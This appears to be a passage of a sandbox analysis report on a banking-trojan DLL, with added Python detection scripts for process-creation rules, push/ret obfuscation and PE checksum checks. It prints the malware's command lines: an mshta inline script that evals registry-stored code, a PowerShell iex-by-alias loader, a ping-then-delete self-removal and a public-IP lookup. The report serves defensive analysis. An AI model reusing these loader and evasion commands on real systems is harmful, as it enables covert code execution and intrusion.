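Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wulb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wulb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\442E.bi1"
"""

RECORD = re.compile(r"^Source: (\S+) Process created: (\S+) ?(.*)$")

# (rule, required parent basename, required child basename, command-line pattern)
RULES = [
    # Inline HTA that eval()s script pulled out of the registry.
    ("mshta_inline_hta_regread", None, "mshta.exe",
     re.compile(r"about:<hta:application>.*regread\(", re.I)),
    # mshta handing off to a shell (the Sigma 'MSHTA Spawning Windows Shell' case).
    ("mshta_spawns_powershell", "mshta.exe", "powershell.exe", None),
    # Invoke-Expression hidden behind a throwaway alias.
    ("powershell_alias_iex", None, "powershell.exe",
     re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b", re.I)),
    # Payload staged under HKCU\Software\AppDataLow\Software\Microsoft\<GUID>.
    ("registry_staged_payload", None, None,
     re.compile(r"AppDataLow\\+Software\\+Microsoft\\+[0-9A-F]{8}-", re.I)),
    # ping-as-sleep followed by deletion of the original DLL.
    ("ping_sleep_then_delete", None, "cmd.exe",
     re.compile(r"ping\s+(?:localhost|127\.0\.0\.1)\s+-n\s+\d+.*&&\s*del\b", re.I)),
    # Public-IP discovery through OpenDNS.
    ("external_ip_lookup", None, "cmd.exe",
     re.compile(r"nslookup\s+myip\.opendns\.com", re.I)),
    # PowerShell compiling C# via csc.exe with a response file in %TEMP% (Add-Type footprint).
    ("powershell_addtype_csc", "powershell.exe", "csc.exe",
     re.compile(r"\\AppData\\Local\\Temp\\.*\.cmdline", re.I)),
]

GUID_KEY = re.compile(
    r"AppDataLow\\+Software\\+Microsoft\\+"
    r"([0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12})", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(line):
    """Split one record into (parent basename, child basename, command line)."""
    m = RECORD.match(line.strip())
    if not m:
        return None
    parent, child, cmdline = m.groups()
    return basename(parent), basename(child), cmdline


def match_rules(parent, child, cmdline):
    hits = []
    for name, want_parent, want_child, pattern in RULES:
        if want_parent and parent != want_parent:
            continue
        if want_child and child != want_child:
            continue
        if pattern and not pattern.search(cmdline):
            continue
        hits.append(name)
    return hits


def analyse(lines):
    """Return ({rule: hit count}, {registry GUID keys to acquire during IR})."""
    counts, keys = {}, set()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        for name in match_rules(*rec):
            counts[name] = counts.get(name, 0) + 1
        keys.update(g.upper() for g in GUID_KEY.findall(rec[2]))
    return counts, keys


def analyse_sample():
    return analyse(SAMPLE.splitlines())


if __name__ == "__main__":
    counts, keys = analyse_sample()
    for name, n in sorted(counts.items()):
        print(f"{name:28} {n}")
    print("registry keys to acquire:", ", ".join(sorted(keys)))
```

The GUID set is the practical output for incident response: the HKCU\Software\AppDataLow\Software\Microsoft\<GUID> key holds the staged script (MarkChart) and payload (UtilDiagram) and survives the self-deletion of the DLL, so it is the artifact to export before remediation.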
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5g4e2etf.ffb.ps1
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@48/34@6/6
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B50929 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 1_2_04B50929
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{4C2EA160-3B95-5E09-2540-9F72297443C6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F4BA931B-C3A9-4644-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{4CEDA2E1-3B48-5E20-2540-9F72297443C6}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{A476835D-B351-766B-5D18-970AE1CCBBDE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A405E674-B394-76D2-5D18-970AE1CCBBDE}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{847E04E4-13F8-561E-BDF8-F7EA41AC1BBE}
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 61ee6edf7de65.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 61ee6edf7de65.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbpsd1 source: powershell.exe, 0000000D.00000003.464647670.00000288719D5000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp

Data Obfuscation

Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E29D5 push ecx; retf 1_2_032E29D6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E620A push 3AC006C0h; ret 1_2_032E620F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E5A01 push 8B514074h; retf 1_2_032E5A06
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E501E pushad ; iretd 1_2_032E501F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E301A push es; retf 1_2_032E302C
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E561B push edi; ret 1_2_032E5625
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B57347 push ecx; ret 1_2_04B57357
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F280BF push ecx; ret 3_2_00F280CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F27D50 push ecx; ret 3_2_00F27D59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3561B push edi; ret 3_2_00F35625
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3301A push es; retf 3_2_00F3302C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3501E pushad ; iretd 3_2_00F3501F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F35A01 push 8B514074h; retf 3_2_00F35A06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3620A push 3AC006C0h; ret 3_2_00F3620F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F329D5 push ecx; retf 3_2_00F329D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A06DD0 push ecx; ret 3_2_05A06DD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A07347 push ecx; ret 3_2_05A07357
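The records above are what the "code obfuscation techniques (call, push, ret)" signature keys on: a push immediate (or push register) followed directly by ret or retf branches to the pushed value without a jmp or call, so linear disassembly and call-graph recovery lose the real control flow, and the same sequences appear at matching offsets in the loaddll32.exe and rundll32.exe mappings (1_2_032E620A and 3_2_00F3620A, for instance) because both processes map the same unpacked code. The Python below is an added example, not sandbox or sample code, that scans raw code bytes for those sequences. The buffer is constructed from the byte encodings of the instructions listed above, not extracted from 61ee6edf7de65.dll, and the scan is a byte-pattern match rather than a disassembler: run it over code sections only and expect false positives in data.

```python
"""Scan raw x86 code bytes for push/ret control-flow obfuscation.

Added example for this report, not sandbox or sample code. 'push X; ret' and
'push X; retf' branch to the pushed value without a jmp or call, which is why
linear disassembly and call-graph tools lose track of the real flow. SAMPLE is
constructed from the byte encodings of the sequences the report lists above;
it is not extracted from 61ee6edf7de65.dll. The scan is a byte-pattern match,
not a disassembler: run it over code sections and expect false positives in data.
"""

PUSH_ONE_BYTE = {
    0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x60: "pushad",
}
RET_ONE_BYTE = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
RET_WITH_IMM16 = {0xC2: "ret", 0xCA: "retf"}   # ret imm16 / retf imm16

# Constructed buffer: a normal prologue, then the report's sequences, then a bare ret.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                       # push ebp; mov ebp, esp   (no ret follows: not flagged)
    0x68, 0xC0, 0x06, 0xC0, 0x3A, 0xC3,     # push 3AC006C0h; ret      (cf. 1_2_032E620A)
    0x90, 0x90,                             # nop; nop
    0x68, 0x74, 0x40, 0x51, 0x8B, 0xCB,     # push 8B514074h; retf     (cf. 1_2_032E5A01)
    0x33, 0xC0,                             # xor eax, eax
    0x51, 0xC3,                             # push ecx; ret            (cf. 1_2_04B57347)
    0x60, 0xCF,                             # pushad; iretd            (cf. 1_2_032E501E)
    0x06, 0xCB,                             # push es; retf            (cf. 1_2_032E301A)
    0x57, 0xC3,                             # push edi; ret            (cf. 1_2_032E561B)
    0xC3,                                   # ret with no push: not flagged
])


def decode_push(buf, i):
    """Return (length, text, pushed immediate or None) if buf[i] starts a push."""
    op = buf[i]
    if op in PUSH_ONE_BYTE:
        return 1, PUSH_ONE_BYTE[op], None
    if op == 0x68 and i + 5 <= len(buf):                     # push imm32
        imm = int.from_bytes(buf[i + 1:i + 5], "little")
        return 5, f"push {imm:08X}h", imm
    if op == 0x6A and i + 2 <= len(buf):                     # push imm8, sign-extended
        imm = int.from_bytes(buf[i + 1:i + 2], "little", signed=True) & 0xFFFFFFFF
        return 2, f"push {imm:08X}h", imm
    return None


def decode_ret(buf, i):
    """Return (length, text) if buf[i] is a near, far or interrupt return."""
    op = buf[i]
    if op in RET_ONE_BYTE:
        return 1, RET_ONE_BYTE[op]
    if op in RET_WITH_IMM16 and i + 3 <= len(buf):
        imm = int.from_bytes(buf[i + 1:i + 3], "little")
        return 3, f"{RET_WITH_IMM16[op]} {imm:X}h"
    return None


def find_push_ret(buf, base=0):
    """Return [(address, 'push ...; ret...', immediate or None)] for each push
    directly followed by a return. For push imm32 the immediate is the real
    branch target, so it can be handed to a disassembler as a code reference."""
    hits, i = [], 0
    while i < len(buf):
        push = decode_push(buf, i)
        if push:
            plen, ptext, imm = push
            ret = decode_ret(buf, i + plen) if i + plen < len(buf) else None
            if ret:
                hits.append((base + i, f"{ptext}; {ret[1]}", imm))
                i += plen + ret[0]
                continue
        i += 1
    return hits


def scan_sample():
    return find_push_ret(SAMPLE)


if __name__ == "__main__":
    for addr, text, imm in scan_sample():
        target = f"  -> {imm:08X}" if imm is not None else ""
        print(f"{addr:08X}  {text}{target}")
```

Pass the section's virtual address as base to get addresses in the report's 1_2_ / 3_2_ notation; the immediates of the push imm32 hits are the targets to mark as code when a disassembler has stopped at the ret.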
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_04B4653E
Source: 32ysuxeg.dll.19.dr Static PE information: real checksum: 0x0 should be: 0xff6f
Source: 61ee6edf7de65.dll Static PE information: real checksum: 0x201ff should be: 0x2296e
Source: vn3zgr4g.dll.24.dr Static PE information: real checksum: 0x0 should be: 0x1abd
Source: hddjt5kh.dll.14.dr Static PE information: real checksum: 0x0 should be: 0xbe6e
Source: qmanv25g.dll.20.dr Static PE information: real checksum: 0x0 should be: 0x4532
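The checksum records above show two different situations. The four csc.exe-built DLLs carry a CheckSum of 0x0, which is simply a field the linker never stamped; Windows validates the checksum only for drivers, boot-time DLLs and DLLs loaded into critical system processes, so a zero value on user-mode output is unremarkable on its own. 61ee6edf7de65.dll instead carries a non-zero value (0x201ff) that does not match the value computed over the file (0x2296e), which means the bytes changed after the linker stamped it, as a packer or post-link patching would. The Python below is an added example, not sandbox code, that reimplements the image checksum on raw bytes and classifies a file into those cases; build_minimal_pe() is a constructed, header-only stub (not a loadable image) so the example runs offline, and the field offsets follow the PE specification.

```python
"""Recompute and classify the PE image checksum.

Added example for this report, not sandbox code. The checksum is the
ones'-complement sum of the file's 16-bit words with the CheckSum field itself
skipped, folded to 16 bits and added to the file length (the algorithm behind
imagehlp's CheckSumMappedFile). build_minimal_pe() is a constructed 184-byte
header-only stub, not a loadable image, used so the example runs offline.
"""
import struct

CHECKSUM_FIELD = 0x58   # IMAGE_OPTIONAL_HEADER.CheckSum, relative to the PE signature (PE32 and PE32+)


def checksum_offset(data):
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    return e_lfanew + CHECKSUM_FIELD


def stored_checksum(data):
    return struct.unpack_from("<I", data, checksum_offset(data))[0]


def pe_checksum(data):
    skip = checksum_offset(data)
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off in (skip, skip + 2):              # leave the CheckSum field out of the sum
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)  # end-around carry
    if len(data) & 1:                            # odd trailing byte counts as a low byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def classify(data):
    """'unset' (0, never stamped: the csc.exe output above), 'valid', or
    'mismatch' (stamped but stale: 61ee6edf7de65.dll, 0x201ff vs 0x2296e)."""
    stored = stored_checksum(data)
    if stored == 0:
        return "unset"
    return "valid" if stored == pe_checksum(data) else "mismatch"


def build_minimal_pe(stored):
    """Constructed stub: DOS header, PE signature, IMAGE_FILE_HEADER for i386 with
    DLL | 32BIT_MACHINE | EXECUTABLE_IMAGE (the sample's own flags), and a zeroed
    PE32 optional header carrying only the magic and the requested CheckSum."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0x60, 0x2102)
    opt = bytearray(0x60)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 0x40, stored)                         # CheckSum
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


if __name__ == "__main__":
    for value in (0, 0xC44E, 0x201FF):
        stub = build_minimal_pe(value)
        print(f"stored {value:#x}  computed {pe_checksum(stub):#x}  {classify(stub)}")
```

On a real file, pass the whole file's bytes; a "mismatch" result is the one worth triaging, because it says the image was altered after link time regardless of what any signature or version resource claims.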
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.dll

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR
Source: C:\Windows\explorer.exe Process created: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll"
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 (4 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116 Thread sleep count: 4466 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628 Thread sleep count: 4967 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1549
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 614
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1341
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 359
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 382
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 899
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 571
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1971
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1192
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 2167
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1082
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1315
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1042
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 430
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6191
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4466
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4967
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe API coverage: 7.4 %
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_04B3B190
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_04B3B2F7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_04B4D39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_059EB190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_059FD39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_059EB2F7
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4FD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_04B4FD82
Source: explorer.exe, 0000001A.00000000.508501495.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001A.00000000.509648591.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001A.00000000.471555007.000000000D462000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ger_cw5n1h2txy
